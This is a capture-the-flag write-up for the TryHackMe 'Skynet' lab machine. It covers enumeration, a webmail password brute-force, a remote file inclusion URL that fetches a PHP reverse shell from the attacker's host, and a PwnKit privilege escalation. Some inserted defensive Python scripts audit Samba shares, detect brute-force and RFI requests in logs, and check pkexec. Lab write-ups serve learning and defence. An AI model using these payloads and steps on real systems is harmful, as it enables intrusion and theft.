Skynet — TryHackMe Room Simple Writeup | 2023
2023-5-10 02:38:25 Author: infosecwriteups.com (view original) Views: 20

A vulnerable Terminator-themed Linux machine | TryHackMe Room Simple Writeup | Karthikeyan Nagaraj

Karthikeyan Nagaraj

InfoSec Write-ups

Nmap:

$ nmap -sC -sV <MACHINE_IP>

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet

110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL CAPA RESP-CODES TOP

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login more listed have capabilities ID LITERAL+ LOGINDISABLEDA0001 IDLE LOGIN-REFERRALS OK Pre-login ENABLE SASL-IR

445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2023-05-07T05:07:19
|_ start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-05-07T00:07:19-05:00

Gobuster:

└─$ gobuster dir -u http://10.10.71.82/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================

[+] Url: http://10.10.71.82/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s

===============================================================
Starting gobuster in directory enumeration mode
===============================================================

/admin (Status: 301) [Size: 310] [--> http://10.10.71.82/admin/]
/ai (Status: 301) [Size: 307] [--> http://10.10.71.82/ai/]
/config (Status: 301) [Size: 311] [--> http://10.10.71.82/config/]
/squirrelmail (Status: 301) [Size: 317] [--> http://10.10.71.82/squirrelmail/]
/css (Status: 301) [Size: 308] [--> http://10.10.71.82/css/]
/js (Status: 301) [Size: 307] [--> http://10.10.71.82/js/]

===============================================================
2023/05/07 11:25:45 Finished
===============================================================

Enum4linux:

1. What is Miles' password for his emails?

  • First, log in to the anonymous share with no password
  • We found a file and a directory, so let's download the files using get <FileName>
  • Now let's cd into logs and download all the files
Attention.txt
log1.txt
log2.txt and log3.txt contents
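The anonymous share above is what makes the first foothold possible: a share that opens with no password and happens to hold a password list. An added example (not code from the write-up or the room) that a defender can run against a Samba configuration to surface exactly that kind of share, plus whether SMB signing is mandatory (nmap reported it as "enabled but not required"). The sample smb.conf, its paths and the share names are constructed for the demo, not taken from the target:

```python
"""Audit a Samba smb.conf for shares that open without credentials.

Added example, not code from the original write-up or from the room. The
box exposes an anonymous share that smbclient opens with no password, and
that share leaks a password list. This script parses smb.conf and reports
every share that is guest-accessible, plus whether SMB signing is mandatory
(nmap reported it as "enabled but not required"). The sample configuration
and its paths are constructed for the demo, not taken from the target.
"""
import configparser

# Constructed sample smb.conf resembling a box that publishes a guest share.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   server signing = auto

[anonymous]
   path = /srv/samba/anonymous
   guest ok = yes
   browseable = yes
   read only = yes

[milesdyson]
   path = /home/milesdyson/share
   valid users = milesdyson
   guest ok = no
   browseable = no
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {key: value}}.

    smb.conf is INI-like, so configparser works once interpolation is off
    (Samba values contain '%' macros) and strict mode is relaxed (Samba
    tolerates repeated keys). Keys come back lower-cased, as Samba treats them."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return {name: dict(cp.items(name)) for name in cp.sections()}


def is_truthy(value):
    return value.strip().lower() in TRUE_VALUES


def guest_accessible_shares(conf):
    """Names of shares a client can open with no password.

    'public' is Samba's synonym for 'guest ok', and 'guest only' implies it."""
    findings = []
    for name, opts in conf.items():
        if name.lower() == "global":
            continue
        guest = opts.get("guest ok", opts.get("public", "no"))
        if is_truthy(guest) or is_truthy(opts.get("guest only", "no")):
            findings.append(name)
    return findings


def signing_required(conf):
    """True only when the global section forces SMB signing."""
    value = conf.get("global", {}).get("server signing", "default")
    return value.strip().lower() == "mandatory"


if __name__ == "__main__":
    conf = parse_smb_conf(SAMPLE_SMB_CONF)
    print("guest-accessible shares:", guest_accessible_shares(conf))
    print("signing mandatory:", signing_required(conf))
```

Point it at a real /etc/samba/smb.conf by reading the file into parse_smb_conf; any share it lists is reachable exactly the way the write-up reaches the anonymous share, so either the share is intentional and holds nothing sensitive, or guest ok should be set to no.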

We have found a list of passwords in log1.txt, so let's use that file to brute-force the /squirrelmail login using Burp Suite

  1. Capture the request through Burp
  2. Send it to Intruder and use Sniper as the attack type
  3. Move to Payloads and add the password list, or copy and paste it

We found a redirect to webmail.php for one of the requests, which looks interesting, so copy and paste that password into the login field

Voila!! We found the password :)

Ans: cyborg007haloterminator

2. What is the hidden directory?

  1. On opening the mails below, we found a password
1st Mail
2nd Mail

I used Rapid Tables to decrypt the message

3rd Mail

2. We got the password, so let's log in to the /milesdyson share with the username milesdyson and the password we found in the mail: )s{A&2Z=F^n_E.B`

We are in, now let's explore!!

$ smbclient //10.10.71.82/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.

smb: \> ls
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019

smb: \> cd notes

smb: \notes\> ls
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
====> important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:31:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:31:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:31:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:31:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:31:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:31:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:31:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:31:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:31:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:31:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:31:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:31:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:31:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:31:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:31:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:31:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:31:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:31:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:31:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:31:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:31:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:31:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:31:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:31:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:31:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:31:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:31:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019

9204224 blocks of size 1024. 5819264 blocks available

We found a file called important.txt which contains the hidden directory

Ans: /45kra24zxs28v3yd

3. What is the vulnerability called when you can include a remote file for malicious purposes?

Ans: Remote File Inclusion

4. What is the user flag?

Now that we have found the hidden directory, let's brute-force further with Gobuster

gobuster dir -u http://<Machine-IP>/45kra24zxs28v3yd -w <Wordlist-Location> 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.223.209/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 418]
/administrator (Status: 301) [Size: 333] [--> http://10.10.223.209/45kra24zxs28v3yd/administrator/]

===============================================================
Finished
===============================================================

On /administrator

Googling about this, we found a File Inclusion vulnerability

Exploit:

For this, we can run a simple Python HTTP server to host the reverse shell

  1. Download the reverse shell file and move it to the /var/www/html directory or your /home directory with the file name php_reverse_shell.php, and make sure to set your system IP and port 4444 inside the reverse shell file
  2. Now let's start Python's HTTP server
  3. Start a reverse listener using netcat with the port you used in the reverse shell
  4. Now let's execute the payload below

http://<Machine_IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<Your-System-IP>/php_reverse_shell.php

We got the reverse shell; cd /home and cat user.txt

Ans: 7ce5c2109a40f958099283600a9ae807
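Both web-side steps in this write-up leave a clear trace in the Apache access log: the Intruder run is a burst of POSTs to the webmail login from one address, and the urlConfig payload is a query parameter whose value is itself a URL. An added example (not code from the write-up or the room) that flags both patterns over constructed log lines. The login path /squirrelmail/src/redirect.php, the thresholds and every IP address are assumptions made for the demo:

```python
"""Flag the two web-side techniques from this write-up in Apache access logs.

Added example, not code from the original write-up or from the room. It
parses constructed Apache combined-format log lines and reports
(1) login brute-force bursts against the webmail login endpoint and
(2) remote file inclusion attempts, i.e. a query parameter whose value is
itself a URL or a PHP stream wrapper. The login path
/squirrelmail/src/redirect.php and every IP below are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

LOGIN_PATH = "/squirrelmail/src/redirect.php"  # assumed SquirrelMail login POST target
BURST_COUNT = 10       # this many login POSTs from one IP ...
BURST_WINDOW_S = 60    # ... inside this many seconds is a brute-force burst
# A parameter value that is a URL (http://, https://, ftp://, or protocol-relative //)
URL_VALUE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Or a PHP stream wrapper, which include() also resolves when allow_url_include is on
WRAPPER_RE = re.compile(r"^(?:php|data|expect|phar|file):", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def login_bursts(events):
    """Return {ip: max_posts_in_window} for IPs that POST to LOGIN_PATH at least
    BURST_COUNT times inside any BURST_WINDOW_S-second sliding window."""
    per_ip = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and urlsplit(ev["target"]).path == LOGIN_PATH:
            per_ip[ev["ip"]].append(ev["ts"])
    hits = {}
    for ip, times in per_ip.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > BURST_WINDOW_S:
                start += 1
            best = max(best, end - start + 1)
        if best >= BURST_COUNT:
            hits[ip] = best
    return hits


def rfi_attempts(events):
    """Return (ip, path, param, value) for every query parameter whose value is a
    URL or stream wrapper: the shape of the urlConfig=http://... request above."""
    out = []
    for ev in events:
        parts = urlsplit(ev["target"])
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if URL_VALUE_RE.match(value) or WRAPPER_RE.match(value):
                out.append((ev["ip"], parts.path, key, value))
    return out


def scan(lines):
    """Run both detections over raw log lines."""
    events = [ev for ev in map(parse_line, lines) if ev]
    return {"login_bursts": login_bursts(events), "rfi": rfi_attempts(events)}


def _line(ip, ts, method, target, status):
    return f'{ip} - - [{ts}] "{method} {target} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log: one normal visitor, a 12-request login burst and one RFI probe.
SAMPLE_LOG = (
    [_line("192.0.2.10", "07/May/2023:11:20:01 +0000", "GET", "/squirrelmail/src/login.php", 200)]
    + [_line("203.0.113.5", f"07/May/2023:11:25:{i:02d} +0000", "POST", LOGIN_PATH, 302)
       for i in range(12)]
    + [_line("203.0.113.5", "07/May/2023:11:40:13 +0000", "GET",
             "/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php"
             "?urlConfig=http://198.51.100.7/shell.php", 200),
       _line("192.0.2.10", "07/May/2023:11:41:00 +0000", "GET", "/ai/?page=about", 200)]
)

if __name__ == "__main__":
    for name, result in scan(SAMPLE_LOG).items():
        print(name, result)
```

Feed scan() the lines of a real access log to run it for real. The RFI check is deliberately about the shape of the value rather than a fixed parameter name, so it also catches the same technique against a different script; on the server side, the fix that removes the class of bug is allow_url_include=Off together with an allow-list of includable files instead of a user-supplied path.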

5. What is the root flag?

First, let's make the shell interactive using Python!

python3 -c "import pty;pty.spawn('/bin/bash')"

  1. Download the LinPEAS file on your machine and move it to /var/www/html or your /home directory
  2. Now let's download the file on the target machine using wget
  3. Now let's change the file permission, then execute the file!!

Let's download the files and move them to the target machine!!

git clone https://github.com/berdav/CVE-2021-4034
zip exploit CVE-2021-4034 -r

Move the zip file to /var/www/html or /home, then download it on the target machine using wget

cd CVE-2021-4034
make
./cve-2021-4034
cd /root
cat root.txt
Ans: 3f0372db24753accc7179a282cd6a949
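The root step relies on pkexec still being setuid-root on an unpatched polkit. The documented interim mitigation for CVE-2021-4034 until polkit is patched is to drop that bit (chmod 0755 /usr/bin/pkexec). An added example (not code from the write-up or the room) that checks whether the workaround is in place and, more generally, lists every setuid-root binary under a tree so it can be compared with an expected baseline; the pkexec path is the usual one but is an assumption here:

```python
"""Check whether the PwnKit (CVE-2021-4034) workaround is in place.

Added example, not code from the original write-up or from the room. The
documented interim mitigation is to remove the setuid bit from pkexec
(chmod 0755 /usr/bin/pkexec) until a patched polkit is installed. This
script reports whether pkexec is still setuid-root and lists every
setuid-root regular file under a directory tree so a defender can diff it
against a baseline. The default pkexec path is an assumption.
"""
import os
import stat


def is_setuid_root(st_mode, st_uid):
    """True when the mode carries the setuid bit and the owner is uid 0."""
    return bool(st_mode & stat.S_ISUID) and st_uid == 0


def pkexec_workaround_applied(st_mode, st_uid):
    """The workaround holds when pkexec is no longer setuid root.

    Removing the bit disables pkexec's privilege-switching function entirely,
    which is the intended trade-off until polkit is patched."""
    return not is_setuid_root(st_mode, st_uid)


def audit_pkexec(path="/usr/bin/pkexec"):
    """Return 'missing', 'setuid-root' or 'not-setuid' for the given path."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return "missing"
    return "setuid-root" if is_setuid_root(st.st_mode, st.st_uid) else "not-setuid"


def find_setuid_root(root):
    """Walk a tree and return sorted paths of setuid-root regular files.

    lstat is used so symlinks are reported by their own mode, not their target's."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; skip rather than abort
            if stat.S_ISREG(st.st_mode) and is_setuid_root(st.st_mode, st.st_uid):
                found.append(path)
    return sorted(found)


if __name__ == "__main__":
    print("pkexec:", audit_pkexec())
    for p in find_setuid_root("/usr/bin"):
        print("setuid-root:", p)
```

A "setuid-root" result on a host whose polkit is older than the vendor's fixed build means the step above still works there; the check is mode-based on purpose, since patched version strings differ per distribution backport.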

Article source: https://infosecwriteups.com/skynet-tryhackme-room-simple-writeup-2023-4dbda93fe756?source=rss----7b722bfd1b8d--bug_bounty